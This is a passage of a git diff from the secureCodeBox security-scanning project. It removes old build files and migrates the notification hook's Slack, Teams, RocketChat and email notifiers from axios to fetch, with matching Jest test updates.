"https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "requires": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - } - }, - "v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true - } - } -} diff --git a/hooks/generic-webhook/hook/package.json b/hooks/generic-webhook/hook/package.json deleted file mode 100644 index 70916740ff..0000000000 --- a/hooks/generic-webhook/hook/package.json +++ /dev/null @@ -1,45 +0,0 @@ -{ - "name": "@securecodebox/hook-generic-webhook", - "version": "1.0.0", - "description": "secureCodeBox Generic WebHook.", - "homepage": "https://www.secureCodeBox.io", - "repository": { - "type": "git", - "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" - }, - "main": "hook.js", - "scripts": { - "test": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, - "keywords": [ - "secureCodeBox", - "security", - "hook" - ], - "author": { - "name": "iteratec GmbH", - "email": "securecodebox@iteratec.com", - "url": "https://www.iteratec.com" - }, - "contributors": [ - { - "name": "Jannik Hollenbach", - "url": "https://github.com/J12934" - }, - { - "name": "Robert Seedorff", - "url": "https://github.com/rseedorff" - } - ], - "bugs": { - "url": "https://github.com/secureCodeBox/secureCodeBox/issues" - }, - "license": "Apache-2.0", - "dependencies": { - "axios": "^1.6.0" - }, - "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" - } -} diff --git a/hooks/generic-webhook/hook/package.json.license b/hooks/generic-webhook/hook/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/generic-webhook/hook/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/hooks/jest.config.js b/hooks/jest.config.js deleted file mode 100644 index f66b8210cc..0000000000 --- a/hooks/jest.config.js +++ /dev/null @@ -1,11 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -module.exports = { - preset: 'ts-jest', - testEnvironment: 'node', - moduleNameMapper: { - "^@/(.*)$": "/$1" - } -} diff --git a/hooks/notification/.gitignore b/hooks/notification/.gitignore index 2da4a04c77..eaf5ea35df 100644 --- a/hooks/notification/.gitignore +++ b/hooks/notification/.gitignore @@ -4,5 +4,6 @@ node_modules **.js +!integration-tests/*.js **.js.map *.tar diff --git a/hooks/notification/Makefile b/hooks/notification/Makefile deleted file mode 100644 index f258990ccc..0000000000 --- a/hooks/notification/Makefile +++ /dev/null @@ -1,23 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = notification - -include ../../hooks.mk - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-test-scan deploy-test-dep-http-webhook - -.PHONY: deploy -deploy: - @echo ".: 💾 Deploying '$(name)' $(hook-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install notification-hook . \ - --values ../../tests/integration/hooks/__testFiles__/notification-values.yaml \ - --set="hook.image.repository=docker.io/$(IMG_NS)/$(hook-prefix)-$(name)" \ - --set="hook.image.tag=$(IMG_TAG)" \ - --set="hook.image.pullPolicy=IfNotPresent" diff --git a/hooks/notification/Taskfile.yaml b/hooks/notification/Taskfile.yaml new file mode 100644 index 0000000000..782e978bd0 --- /dev/null +++ b/hooks/notification/Taskfile.yaml @@ -0,0 +1,26 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + hookName: notification + additionalHelmInstallArgsForHook: | + --values={{ .TASKFILE_DIR }}/notification/integration-tests/notification-hook-helm-values.yaml \ + test-scan: + taskfile: ../../scanners/test-scan/Taskfile.yaml + +tasks: + predeploy: + deps: + - demo-targets:deploy:http-webhook + cmds: + - task: test-scan:build + - task: test-scan:deploy \ No newline at end of file diff --git a/scanners/gitleaks/Makefile b/hooks/notification/hook/.gitignore similarity index 51% rename from scanners/gitleaks/Makefile rename to hooks/notification/hook/.gitignore index 281cae8883..fa06daa869 100644 --- a/scanners/gitleaks/Makefile +++ b/hooks/notification/hook/.gitignore @@ -1,11 +1,10 @@ -#!/usr/bin/make -f -# # SPDX-FileCopyrightText: the secureCodeBox authors # # SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = gitleaks -include ../../scanners.mk +node_modules +*.map +**.js +!**.test.js +*.tar +build/ \ No newline at end of file diff --git a/hooks/notification/hook/Dockerfile b/hooks/notification/hook/Dockerfile index f463dc22d1..28186832f2 100644 --- a/hooks/notification/hook/Dockerfile +++ b/hooks/notification/hook/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS install RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM node:22-alpine AS build RUN mkdir -p /home/app @@ -21,4 +21,5 @@ RUN npm run build && rm -rf node_modules FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ COPY --from=install --chown=root:root --chmod=755 /home/app/node_modules/ ./node_modules/ -COPY --from=build --chown=root:root --chmod=755 /home/app/ ./ +COPY --from=build --chown=root:root --chmod=755 /home/app/build/ ./ +COPY --chown=root:root --chmod=755 notification-templates/ ./notification-templates/ diff --git a/hooks/notification/hook/Notifier.ts b/hooks/notification/hook/Notifier.ts index be9601087b..56500e8dbf 100644 --- a/hooks/notification/hook/Notifier.ts +++ b/hooks/notification/hook/Notifier.ts @@ -2,8 +2,6 @@ // // SPDX-License-Identifier: Apache-2.0 -import { Finding } from "./model/Finding"; - export interface Notifier { /** * Sends a Notification Message to the desired End-Point (e.g. Slack or MS Teams) diff --git a/hooks/notification/hook/NotifierFactory.ts b/hooks/notification/hook/NotifierFactory.ts index 82dbb76507..8e05ad381d 100644 --- a/hooks/notification/hook/NotifierFactory.ts +++ b/hooks/notification/hook/NotifierFactory.ts @@ -2,17 +2,20 @@ // // SPDX-License-Identifier: Apache-2.0 -import { Notifier } from "./Notifier"; -import { NotifierType } from "./NotifierType"; -import { SlackNotifier } from "./Notifiers/SlackNotifier"; -import { SlackAppNotifier } from "./Notifiers/SlackAppNotifier"; -import { EMailNotifier } from "./Notifiers/EMailNotifier"; -import { MSTeamsNotifier } from "./Notifiers/MSTeamsNotifier"; -import { TrelloNotifier } from "./Notifiers/TrelloNotifier"; -import { NotificationChannel } from "./model/NotificationChannel"; -import { Scan } from "./model/Scan"; -import { Finding } from "./model/Finding"; -import { RocketChatNotifier } from "./Notifiers/RocketChat"; +import { createTransport } from "nodemailer"; + +import { NotifierType } from "./NotifierType.js"; +import { SlackNotifier } from "./Notifiers/SlackNotifier.js"; +import { SlackAppNotifier } from "./Notifiers/SlackAppNotifier.js"; +import { EMailNotifier } from "./Notifiers/EMailNotifier.js"; +import { MSTeamsNotifier } from "./Notifiers/MSTeamsNotifier.js"; +import { TrelloNotifier } from "./Notifiers/TrelloNotifier.js"; +import { NotificationChannel } from "./model/NotificationChannel.js"; +import { RocketChatNotifier } from "./Notifiers/RocketChat.js"; + +import type { Notifier } from "./Notifier"; +import type { Scan } from "./model/Scan"; +import type { Finding } from "./model/Finding"; export class NotifierFactory { static create( @@ -25,7 +28,7 @@ export class NotifierFactory { case NotifierType.SLACK: return new SlackNotifier(channel, scan, findings, args); case NotifierType.EMAIL: - return new EMailNotifier(channel, scan, findings, args); + return new EMailNotifier(channel, scan, findings, args, createTransport); case NotifierType.SLACK_APP: return new SlackAppNotifier(channel, scan, findings, args); case NotifierType.MS_TEAMS: diff --git a/hooks/notification/hook/Notifiers/AbstractNotifier.ts b/hooks/notification/hook/Notifiers/AbstractNotifier.ts index 2a5aff3ee5..86a978b423 100644 --- a/hooks/notification/hook/Notifiers/AbstractNotifier.ts +++ b/hooks/notification/hook/Notifiers/AbstractNotifier.ts @@ -2,18 +2,20 @@ // // SPDX-License-Identifier: Apache-2.0 -import { Notifier } from "../Notifier"; -import { NotifierType } from "../NotifierType"; -import { Finding } from "../model/Finding"; -import { NotificationChannel } from "../model/NotificationChannel"; import * as jsyaml from "js-yaml"; -import { Scan } from "../model/Scan"; import * as path from "path"; -import * as nunjucks from "nunjucks"; +import nunjucks from "nunjucks"; + +import { Notifier } from "../Notifier.js"; +import { NotifierType } from "../NotifierType.js"; + +import type { Finding } from "../model/Finding"; +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Scan } from "../model/Scan"; export abstract class AbstractNotifier implements Notifier { private static readonly TEMPLATE_DIR: string = path.join( - __dirname, + import.meta.dirname, "../notification-templates", ); private static readonly TEMPLATE_FILE_TYPE = "njk"; diff --git a/hooks/notification/hook/Notifiers/AbstractWebHookNotifier.ts b/hooks/notification/hook/Notifiers/AbstractWebHookNotifier.ts index 6b6707f72d..f446dea87b 100644 --- a/hooks/notification/hook/Notifiers/AbstractWebHookNotifier.ts +++ b/hooks/notification/hook/Notifiers/AbstractWebHookNotifier.ts @@ -1,13 +1,18 @@ // SPDX-FileCopyrightText: the secureCodeBox authors // // SPDX-License-Identifier: Apache-2.0 -import axios from "axios"; -import { Scan } from "../model/Scan"; -import { Finding } from "../model/Finding"; -import { NotifierType } from "../NotifierType"; -import type { AxiosRequestConfig } from "axios"; -import { AbstractNotifier } from "./AbstractNotifier"; -import { NotificationChannel } from "../model/NotificationChannel"; +import { NotifierType } from "../NotifierType.js"; +import { AbstractNotifier } from "./AbstractNotifier.js"; + +import type { Scan } from "../model/Scan"; +import type { Finding } from "../model/Finding"; +import type { NotificationChannel } from "../model/NotificationChannel"; + +export interface FetchRequestOptions { + method?: string; + headers?: Record; + body?: string; +} export abstract class AbstractWebHookNotifier extends AbstractNotifier { protected abstract type: NotifierType; @@ -27,13 +32,20 @@ export abstract class AbstractWebHookNotifier extends AbstractNotifier { protected async sendPostRequest( message: string, - options?: AxiosRequestConfig, + options?: FetchRequestOptions, ) { try { - const response = await axios.post( + const response = await fetch( this.resolveEndPoint(), - message, - options, + { + method: 'POST', + headers: { + 'Content-Type': 'application/json', + ...(options?.headers || {}) + }, + body: message, + ...options + } ); console.log( `Notifier sent out request for notification, got response code: ${response.status}`, diff --git a/hooks/notification/hook/Notifiers/EMailNotifier.test.ts b/hooks/notification/hook/Notifiers/EMailNotifier.test.ts index ce6a6f18e1..413a364203 100644 --- a/hooks/notification/hook/Notifiers/EMailNotifier.test.ts +++ b/hooks/notification/hook/Notifiers/EMailNotifier.test.ts @@ -6,20 +6,17 @@ import { NotifierType } from "../NotifierType"; import { EMailNotifier } from "./EMailNotifier"; import { NotificationChannel } from "../model/NotificationChannel"; import { Scan } from "../model/Scan"; +import type { createTransport as createTransportType } from "nodemailer"; const sendMail = jest.fn(); const close = jest.fn(); -jest.mock("nodemailer", () => { +let createTransport = jest.fn(() => { return { - createTransport: () => { - return { - sendMail, - close, - }; - }, + sendMail, + close, }; -}); +}) as unknown as typeof createTransportType; const creationTimestamp = new Date("2021-01-01T14:29:25Z"); @@ -82,13 +79,14 @@ test("Should Send Mail", async () => { const args = new Array(); args[EMailNotifier.EMAIL_FROM] = from; - const notifier = new EMailNotifier(channel, scan, [], args); + const notifier = new EMailNotifier(channel, scan, [], args, createTransport); await notifier.sendMessage(); - expect(sendMail).toHaveBeenCalledWith({ - from: "secureCodeBox", - html: `Scan demo-scan-1601086432
+ expect(sendMail).toHaveBeenCalledWith( + expect.objectContaining({ + from: "secureCodeBox", + html: `Scan demo-scan-1601086432
Created at ${creationTimestamp.toString()}

@@ -104,8 +102,8 @@ A Client Error response code was returned by the server: 1
Information Disclosure - Sensitive Information in URL: 1
Strict-Transport-Security Header Not Set: 1
`, - subject: "New nmap security scan results are available!", - text: `*Scan demo-scan-1601086432* + subject: "New nmap security scan results are available!", + text: `*Scan demo-scan-1601086432* Created at ${creationTimestamp.toString()} *Findings Severity Overview*: @@ -119,8 +117,9 @@ A Client Error response code was returned by the server: 1 Information Disclosure - Sensitive Information in URL: 1 Strict-Transport-Security Header Not Set: 1 `, - to: "mail@example.com", - }); + to: "mail@example.com", + }), + ); expect(close).toHaveBeenCalled(); }); @@ -143,13 +142,14 @@ test("should send mail to recipient overwritten in scan annotation", async () => const args = new Array(); args[EMailNotifier.EMAIL_FROM] = from; - const notifier = new EMailNotifier(channel, scan, [], args); + const notifier = new EMailNotifier(channel, scan, [], args, createTransport); await notifier.sendMessage(); - expect(sendMail).toHaveBeenCalledWith({ - from: "secureCodeBox", - html: `Scan demo-scan-1601086432
+ expect(sendMail).toHaveBeenCalledWith( + expect.objectContaining({ + from: "secureCodeBox", + html: `Scan demo-scan-1601086432
Created at ${creationTimestamp.toString()}

@@ -165,8 +165,8 @@ A Client Error response code was returned by the server: 1
Information Disclosure - Sensitive Information in URL: 1
Strict-Transport-Security Header Not Set: 1
`, - subject: "New nmap security scan results are available!", - text: `*Scan demo-scan-1601086432* + subject: "New nmap security scan results are available!", + text: `*Scan demo-scan-1601086432* Created at ${creationTimestamp.toString()} *Findings Severity Overview*: @@ -180,7 +180,8 @@ A Client Error response code was returned by the server: 1 Information Disclosure - Sensitive Information in URL: 1 Strict-Transport-Security Header Not Set: 1 `, - to: "foo@example.com", - }); + to: "foo@example.com", + }), + ); expect(close).toHaveBeenCalled(); }); diff --git a/hooks/notification/hook/Notifiers/EMailNotifier.ts b/hooks/notification/hook/Notifiers/EMailNotifier.ts index 24da668d0f..47464d41b7 100644 --- a/hooks/notification/hook/Notifiers/EMailNotifier.ts +++ b/hooks/notification/hook/Notifiers/EMailNotifier.ts @@ -2,14 +2,31 @@ // // SPDX-License-Identifier: Apache-2.0 -import { NotifierType } from "../NotifierType"; -import { AbstractNotifier } from "./AbstractNotifier"; -import { createTransport } from "nodemailer"; +import { NotifierType } from "../NotifierType.js"; +import { AbstractNotifier } from "./AbstractNotifier.js"; + +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Finding } from "../model/Finding"; +import type { Scan } from "../model/Scan"; + +import type { createTransport as createTransportType } from "nodemailer"; export class EMailNotifier extends AbstractNotifier { public static readonly SMTP_CONFIG = "SMTP_CONFIG"; public static readonly EMAIL_FROM = "EMAIL_FROM"; protected type: NotifierType.EMAIL; + protected createTransport: typeof createTransportType; + + constructor( + channel: NotificationChannel, + scan: Scan, + findings: Finding[], + args: Object, + createTransport: typeof createTransportType, + ) { + super(channel, scan, findings, args); + this.createTransport = createTransport; + } /** * Emails endPoints are not considered sensitive as they are just the receiver of the email. @@ -29,7 +46,7 @@ export class EMailNotifier extends AbstractNotifier { } protected async sendMail(message: any, smtpConfig: any) { - const transporter = createTransport(smtpConfig); + const transporter = this.createTransport(smtpConfig); try { const info = await transporter.sendMail(message); console.log(info); diff --git a/hooks/notification/hook/Notifiers/MSTeamsNotifier.test.ts b/hooks/notification/hook/Notifiers/MSTeamsNotifier.test.ts index 9ac91314e7..d21965aa79 100644 --- a/hooks/notification/hook/Notifiers/MSTeamsNotifier.test.ts +++ b/hooks/notification/hook/Notifiers/MSTeamsNotifier.test.ts @@ -3,15 +3,24 @@ // SPDX-License-Identifier: Apache-2.0 import { MSTeamsNotifier } from "./MSTeamsNotifier"; -import axios from "axios"; import { NotificationChannel } from "../model/NotificationChannel"; import { NotifierType } from "../NotifierType"; import { Scan } from "../model/Scan"; -jest.mock("axios"); +const originalFetch = global.fetch; beforeEach(() => { - jest.clearAllMocks(); + global.fetch = jest.fn().mockImplementation(() => + Promise.resolve({ + ok: true, + status: 200, + json: () => Promise.resolve({ ok: true }) + }) + ); +}); + +afterEach(() => { + global.fetch = originalFetch; }); const TEAMS_ENDPOINT = @@ -68,10 +77,17 @@ test("Should Send Message With Findings And Severities", async () => { }; const teamsNotifier = new MSTeamsNotifier(channel, scan, [], []); - teamsNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalledWith(TEAMS_ENDPOINT, expect.any(String), { - headers: { "Content-Type": "application/json" }, - }); + await teamsNotifier.sendMessage(); + expect(global.fetch).toHaveBeenCalledWith( + TEAMS_ENDPOINT, + expect.objectContaining({ + method: 'POST', + headers: expect.objectContaining({ + "Content-Type": "application/json" + }), + body: expect.any(String) + }) + ); }); test("Should Send Minimal Template For Empty Findings", async () => { @@ -104,8 +120,15 @@ test("Should Send Minimal Template For Empty Findings", async () => { }; const n = new MSTeamsNotifier(channel, scan, [], []); - n.sendMessage(); - expect(axios.post).toHaveBeenCalledWith(TEAMS_ENDPOINT, expect.any(String), { - headers: { "Content-Type": "application/json" }, - }); + await n.sendMessage(); + expect(global.fetch).toHaveBeenCalledWith( + TEAMS_ENDPOINT, + expect.objectContaining({ + method: 'POST', + headers: expect.objectContaining({ + "Content-Type": "application/json" + }), + body: expect.any(String) + }) + ); }); diff --git a/hooks/notification/hook/Notifiers/MSTeamsNotifier.ts b/hooks/notification/hook/Notifiers/MSTeamsNotifier.ts index d056d22f98..9a61935c3e 100644 --- a/hooks/notification/hook/Notifiers/MSTeamsNotifier.ts +++ b/hooks/notification/hook/Notifiers/MSTeamsNotifier.ts @@ -2,11 +2,12 @@ // // SPDX-License-Identifier: Apache-2.0 -import { NotifierType } from "../NotifierType"; -import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier"; -import { Finding } from "../model/Finding"; -import { NotificationChannel } from "../model/NotificationChannel"; -import { Scan } from "../model/Scan"; +import { NotifierType } from "../NotifierType.js"; +import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier.js"; + +import type { Finding } from "../model/Finding"; +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Scan } from "../model/Scan"; export class MSTeamsNotifier extends AbstractWebHookNotifier { protected type: NotifierType = NotifierType.MS_TEAMS; diff --git a/hooks/notification/hook/Notifiers/RocketChat.ts b/hooks/notification/hook/Notifiers/RocketChat.ts index 5279f57d85..5ff190a04a 100644 --- a/hooks/notification/hook/Notifiers/RocketChat.ts +++ b/hooks/notification/hook/Notifiers/RocketChat.ts @@ -2,11 +2,12 @@ // // SPDX-License-Identifier: Apache-2.0 -import { NotifierType } from "../NotifierType"; -import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier"; -import { Finding } from "../model/Finding"; -import { NotificationChannel } from "../model/NotificationChannel"; -import { Scan } from "../model/Scan"; +import { NotifierType } from "../NotifierType.js"; +import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier.js"; + +import type { Finding } from "../model/Finding"; +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Scan } from "../model/Scan"; export class RocketChatNotifier extends AbstractWebHookNotifier { protected type: NotifierType = NotifierType.ROCKET_CHAT; diff --git a/hooks/notification/hook/Notifiers/RocketChatNotifier.test.ts b/hooks/notification/hook/Notifiers/RocketChatNotifier.test.ts index 18b0f5068a..a017d993c3 100644 --- a/hooks/notification/hook/Notifiers/RocketChatNotifier.test.ts +++ b/hooks/notification/hook/Notifiers/RocketChatNotifier.test.ts @@ -2,17 +2,27 @@ // // SPDX-License-Identifier: Apache-2.0 -import axios from "axios"; -import { Scan } from "../model/Scan"; -import { Finding } from "../model/Finding"; -import { NotifierType } from "../NotifierType"; -import { RocketChatNotifier } from "./RocketChat"; +import { Scan } from "../model/Scan.js"; +import { NotifierType } from "../NotifierType.js"; + import { NotificationChannel } from "../model/NotificationChannel"; +import { RocketChatNotifier } from "./RocketChat"; +import { Finding } from "../model/Finding"; -jest.mock("axios"); +const originalFetch = global.fetch; beforeEach(() => { - jest.clearAllMocks(); + global.fetch = jest.fn().mockImplementation(() => + Promise.resolve({ + ok: true, + status: 200, + json: () => Promise.resolve({ ok: true }) + }) + ); +}); + +afterEach(() => { + global.fetch = originalFetch; }); const channel: NotificationChannel = { @@ -90,16 +100,17 @@ test("Should Send Message With Findings And Severities", async () => { }); await rocketChatNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalledWith( + expect(global.fetch).toHaveBeenCalledWith( "https://rocketchat.example.com/api/v1/chat.postMessage", - '{"channel":"#securecodebox","text":"New Scan Results for demo-scan-1601086432","attachments":[{"fields":[{"title":"- foobar","value":"hello world","short":false}]}]}', - { - headers: { + expect.objectContaining({ + method: 'POST', + headers: expect.objectContaining({ "Content-Type": "application/json", "X-Auth-Token": "foobar", "X-User-Id": "barfoo", - }, - }, + }), + body: '{"channel":"#securecodebox","text":"New Scan Results for demo-scan-1601086432","attachments":[{"fields":[{"title":"- foobar","value":"hello world","short":false}]}]}' + }) ); }); @@ -116,16 +127,17 @@ test("Should use channel overwrite from annotation if set", async () => { }); await rocketChatNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalledWith( + expect(global.fetch).toHaveBeenCalledWith( "https://rocketchat.example.com/api/v1/chat.postMessage", - '{"channel":"#team-42-channel","text":"New Scan Results for demo-scan-1601086432","attachments":[{"fields":[{"title":"- foobar","value":"hello world","short":false}]}]}', - { - headers: { + expect.objectContaining({ + method: 'POST', + headers: expect.objectContaining({ "Content-Type": "application/json", "X-Auth-Token": "foobar", "X-User-Id": "barfoo", - }, - }, + }), + body: '{"channel":"#team-42-channel","text":"New Scan Results for demo-scan-1601086432","attachments":[{"fields":[{"title":"- foobar","value":"hello world","short":false}]}]}' + }) ); }); @@ -143,15 +155,16 @@ test("Should include link back to defectdojo if set in finding", async () => { }); await rocketChatNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalledWith( + expect(global.fetch).toHaveBeenCalledWith( "https://rocketchat.example.com/api/v1/chat.postMessage", - '{"channel":"#securecodebox","text":"New Scan Results for demo-scan-1601086432","attachments":[{"fields":[{"title":"- foobar","value":"hello world [Open in DefectDojo](https://defectdojo.example.com/finding/42)","short":false}]}]}', - { - headers: { + expect.objectContaining({ + method: 'POST', + headers: expect.objectContaining({ "Content-Type": "application/json", "X-Auth-Token": "foobar", "X-User-Id": "barfoo", - }, - }, + }), + body: '{"channel":"#securecodebox","text":"New Scan Results for demo-scan-1601086432","attachments":[{"fields":[{"title":"- foobar","value":"hello world [Open in DefectDojo](https://defectdojo.example.com/finding/42)","short":false}]}]}' + }) ); }); diff --git a/hooks/notification/hook/Notifiers/SlackAppNotifier.test.ts b/hooks/notification/hook/Notifiers/SlackAppNotifier.test.ts index 1067c691a0..8dd021ac8f 100644 --- a/hooks/notification/hook/Notifiers/SlackAppNotifier.test.ts +++ 